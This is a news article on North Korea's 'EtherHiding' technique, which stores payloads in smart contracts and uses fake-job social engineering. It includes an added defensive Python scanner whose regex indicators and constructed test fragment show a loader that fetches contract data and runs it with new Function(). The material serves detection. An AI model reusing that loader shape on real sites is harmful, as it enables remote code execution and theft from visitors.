North Korean hackers have deployed malware that steals cryptocurrency and sensitive information by embedding malicious code in smart contracts on public blockchain networks, as reported by Google’s Threat Intelligence Group.
This method, known as “EtherHiding,” surfaced in 2023 and is often combined with social engineering, such as approaching victims with fraudulent job offers and interviews and directing them to malicious websites or links, according to Google.
The attackers compromise a legitimate website and inject a JavaScript loader script into it. That loader retrieves a separate malicious payload stored in a smart contract, which is designed to steal funds and data as soon as a user engages with the compromised site.
The compromised website reads the payload from the blockchain through a “read-only” call that does not write a transaction to the ledger, which lets the threat actors evade detection and reduce transaction costs, Google researchers noted.
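The two points above (an injected loader, and a read-only chain call that leaves no on-chain transaction) give a site owner something concrete to look for. The script below is an added, defender-side triage example; it is not code from Google’s report or from the article. It scans a page’s inline scripts for the combination of a read-only JSON-RPC call (`eth_call` is the standard Ethereum JSON-RPC method for calls that do not create a transaction) with dynamic code execution and references to contract addresses that are not on the site’s own allowlist. The indicator patterns, the scoring and the two sample scripts are this example’s own assumptions and constructed inputs, not indicators published by Google.

```python
import re
from dataclasses import dataclass, field

# Heuristic indicators of an EtherHiding-style loader. These regexes are this
# example's assumptions for triage; they are not a definitive detector.
RPC_READ_CALL = re.compile(r'\bmethod\b["\']?\s*:\s*["\']eth_call["\']|\.call\s*\(')
DYNAMIC_EXEC = re.compile(r'\beval\s*\(|new\s+Function\s*\(')
PAYLOAD_DECODE = re.compile(r'hexToString|fromCharCode|\batob\s*\(')
HEX_ADDRESS = re.compile(r'\b0x[0-9a-fA-F]{40}\b')
SCRIPT_TAG = re.compile(r'<script\b[^>]*>(.*?)</script>', re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    name: str
    indicators: list = field(default_factory=list)
    unknown_contracts: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)

    @property
    def suspicious(self) -> bool:
        # The core pattern: a read-only chain call feeding dynamic code execution.
        return "rpc_read_call" in self.indicators and "dynamic_exec" in self.indicators


def scan_script(name: str, text: str, known_contracts=frozenset()) -> Finding:
    """Score one script body against the indicator list."""
    f = Finding(name)
    if RPC_READ_CALL.search(text):
        f.indicators.append("rpc_read_call")
    if DYNAMIC_EXEC.search(text):
        f.indicators.append("dynamic_exec")
    if PAYLOAD_DECODE.search(text):
        f.indicators.append("payload_decode")
    # Any contract address the site does not legitimately use is worth a look.
    for addr in sorted(set(HEX_ADDRESS.findall(text))):
        if addr.lower() not in known_contracts:
            f.unknown_contracts.append(addr)
    if f.unknown_contracts:
        f.indicators.append("unknown_contract")
    return f


def scan_page(html: str, known_contracts=frozenset()) -> list:
    """Extract inline <script> bodies from a page and scan each one."""
    return [scan_script(f"inline-script-{i}", body, known_contracts)
            for i, body in enumerate(SCRIPT_TAG.findall(html))]


def suspicious_scripts(html: str, known_contracts=frozenset()) -> list:
    return [f for f in scan_page(html, known_contracts) if f.suspicious]


# Constructed sample: a legitimate front end reading a token balance via eth_call
# and rendering it as text. It uses a contract address the site owner knows.
KNOWN_CONTRACTS = frozenset({"0x1111111111111111111111111111111111111111"})
BENIGN_DAPP = """
const KNOWN_TOKEN = "0x1111111111111111111111111111111111111111";
const res = await fetch(RPC_URL, {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: KNOWN_TOKEN, data: balanceOfCalldata}, "latest"]})});
const {result} = await res.json();
document.getElementById("balance").textContent = BigInt(result).toString();
"""

# Constructed, non-functional fragment that only reproduces the indicator shape:
# an unknown contract, a read-only call, and the result handed to a code constructor.
INJECTED_SAMPLE = """
var c = "0xabcdefabcdefabcdefabcdefabcdefabcdefabcd";
fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1,
  method: "eth_call", params: [{to: c, data: selectorPlaceholder}, "latest"]})})
  .then(r => r.json())
  .then(j => new Function(hexToString(j.result))());
"""

SAMPLE_PAGE = f"<html><body><script>{BENIGN_DAPP}</script><script>{INJECTED_SAMPLE}</script></body></html>"

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, KNOWN_CONTRACTS):
        flag = "SUSPICIOUS" if finding.suspicious else "ok"
        print(f"{finding.name}: {flag} score={finding.score} {finding.indicators} {finding.unknown_contracts}")
```

A legitimate dApp front end also issues read-only calls, so `rpc_read_call` alone is not a signal; the script only flags a body when the call result is routed into `eval`/`new Function`, and separately lists contract addresses outside the allowlist so an operator can compare them with what the site is supposed to talk to. Pairing this with file-integrity monitoring of the site’s static assets catches the injection itself rather than just its shape.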
The report emphasizes the importance of vigilance in the crypto community to protect users from the scams and hacks that malicious actors use to steal funds and valuable information from individuals and organizations alike.
Be aware: North Korea’s social engineering campaign analyzed
The threat actors will establish fake companies, recruitment agencies, and profiles to target software and cryptocurrency developers with fabricated job offers, according to Google.
After the initial outreach, the attackers shift communication to messaging platforms like Discord or Telegram and instruct the victim to undertake a job assessment or complete a coding task.
“The core of the attack takes place during a technical evaluation phase,” Google Threat Intelligence reported. During this stage, the victim is typically told to download harmful files from online code repositories like GitHub, where the malicious payload is hosted.
In other cases, the attackers lure the victim into a video call during which a fabricated error message is shown, prompting them to download a “patch” to fix it. That patch also contains harmful code.
Once the malicious software is installed on a machine, a second-stage JavaScript-based malware known as “JADESNOW” is activated to steal sensitive data.
A third phase may be implemented for high-value targets, granting the attackers extended access to a compromised machine and other systems connected to its network, Google cautioned.
